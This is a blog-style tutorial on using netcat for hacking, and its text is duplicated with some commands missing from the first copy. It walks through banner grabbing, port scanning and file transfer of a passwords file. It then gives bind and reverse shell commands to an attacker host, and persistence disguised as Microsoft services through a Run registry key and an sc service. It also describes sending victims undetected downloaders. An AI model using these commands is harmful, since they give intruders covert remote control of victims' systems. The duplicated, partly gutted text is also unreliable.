Netcat actually not a hacking tool. It is networking tools. We can use
it to communicate with other computers remotely, data transfer etc. But
We can also use it as Backdoor or hacking tools. "ping" is not hacking
or DoS tool but we can DoS using "Ping" ...no? That is why we can't call
it DDOSER tool.
Anyway, Often netcat called "Swiss Army Knife"
I will explain the basic usage of it now
All option in netcat:
nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.
Banner Grabbing :
root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
sent 16, rcvd 617
How: nc -vvv ip port . Then Hit enter twice.
Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version .... no?
The same way we can find other application version, information:
root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.
You can try to connect to any port excluding 443 since netcat can't communicate over ssl. Or do the tunneling.
Chat with your Hacker friend:
Suppose there are two hacker called hacker1 and hacker2. They don't want to get caught for using other messenger, or they just do private communication.
How they are doing this ? Simple command :
hacker1(Netcat listening):
-vvv stand for verbose(as much as possible)
-l for listening(Opening the port to connect)
-p for port(any specific port to connect)
hacker2(Connecting to hacker1):
nc -vvv 192.168.96.129 4444 (4444 is the port)
hacker1
hacker2
Transfer the File:
Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .
Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).
Hacker1 netcat command was:
hacker2 netcat command was:
nc -vvv 192.168.96.129 >passwords.txt
Let's do a port scan using netcat:
we can scan port with simple command nc -vvv targetip 1-65535
or
Here extra "-z" option use Input output method.
simple to create a backdoor using netcat:
windows server mode:
-L don't die.
-e start command line.
Linux/Unix server mode:
-k don't die
-e command mode.
Connect to the server:
How about Reverse connection? Try the following on victim machin:
nc -e cmd -d attackerip 1337
On your own computer(Attacker):
nc -vv -l -k -p 1337
Now you are thinking that how hacker can install the netcat on victim computer... right? ..
1. They first compromise the system/server. Now they want permanent access. So only way is uploading backdoor, setting it as start up application.
2. They create a batch file or shell script or downloader. Then he sends it to the victim(Undetected by AV). Whenever the victim click on script it start downloading, installing etc automatically.
So how you make the netcat as stealth backdoor? Answer is registry editing. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().
Netcat as start up backdoor:
Run this command:
reg addHKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d “c:\nc.exe -d targetip 1337 -e cmd.exe”
Create a netcat listener on your local computer . Whenever the victim reboot his computer he will get connected to you.
Hackers also can simple create batch script then move it start up folder but it is bad idea.
What about netcat as services ? try:
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
Now try to make the backdoor to connect to you in a specific time (hint: at)
By the way, you can many more things with netcat . netcat is not so bad as a backoor . You now know how netcat can be used for hacking purpose. So be aware for protection.
Try more....
More about it:
www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139 (Download for windows)
Anyway, Often netcat called "Swiss Army Knife"
I will explain the basic usage of it now
All option in netcat:
nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.
Banner Grabbing :
root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
sent 16, rcvd 617
How: nc -vvv ip port . Then Hit enter twice.
Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version .... no?
The same way we can find other application version, information:
root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.
You can try to connect to any port excluding 443 since netcat can't communicate over ssl. Or do the tunneling.
Chat with your Hacker friend:
Suppose there are two hacker called hacker1 and hacker2. They don't want to get caught for using other messenger, or they just do private communication.
How they are doing this ? Simple command :
hacker1(Netcat listening):
nc -vvv -l -p 44444
-vvv stand for verbose(as much as possible)
-l for listening(Opening the port to connect)
-p for port(any specific port to connect)
hacker2(Connecting to hacker1):
nc -vvv 192.168.96.129 4444 (4444 is the port)
hacker2
Transfer the File:
Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .
Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).
Hacker1 netcat command was:
nc -vvv -l -p 4444 <passwords.txt
hacker2 netcat command was:
nc -vvv 192.168.96.129 >passwords.txt
Let's do a port scan using netcat:
we can scan port with simple command nc -vvv targetip 1-65535
or
nc -vvv -z targetip 1-65535
Here extra "-z" option use Input output method.
simple to create a backdoor using netcat:
windows server mode:
nc -L -p 1337 -e cmd.exe
-L don't die.
-e start command line.
Linux/Unix server mode:
nc -l -p 1337 -k -e /bin/bash
-k don't die
-e command mode.
Connect to the server:
nc -vv targetip 1337
How about Reverse connection? Try the following on victim machin:
nc -e cmd -d attackerip 1337
On your own computer(Attacker):
nc -vv -l -k -p 1337
Now you are thinking that how hacker can install the netcat on victim computer... right? ..
1. They first compromise the system/server. Now they want permanent access. So only way is uploading backdoor, setting it as start up application.
2. They create a batch file or shell script or downloader. Then he sends it to the victim(Undetected by AV). Whenever the victim click on script it start downloading, installing etc automatically.
So how you make the netcat as stealth backdoor? Answer is registry editing. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().
Netcat as start up backdoor:
Run this command:
reg addHKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d “c:\nc.exe -d targetip 1337 -e cmd.exe”
Create a netcat listener on your local computer . Whenever the victim reboot his computer he will get connected to you.
Hackers also can simple create batch script then move it start up folder but it is bad idea.
What about netcat as services ? try:
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
Now try to make the backdoor to connect to you in a specific time (hint: at)
By the way, you can many more things with netcat . netcat is not so bad as a backoor . You now know how netcat can be used for hacking purpose. So be aware for protection.
Try more....
More about it:
www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139 (Download for windows)
Tidak ada komentar:
Posting Komentar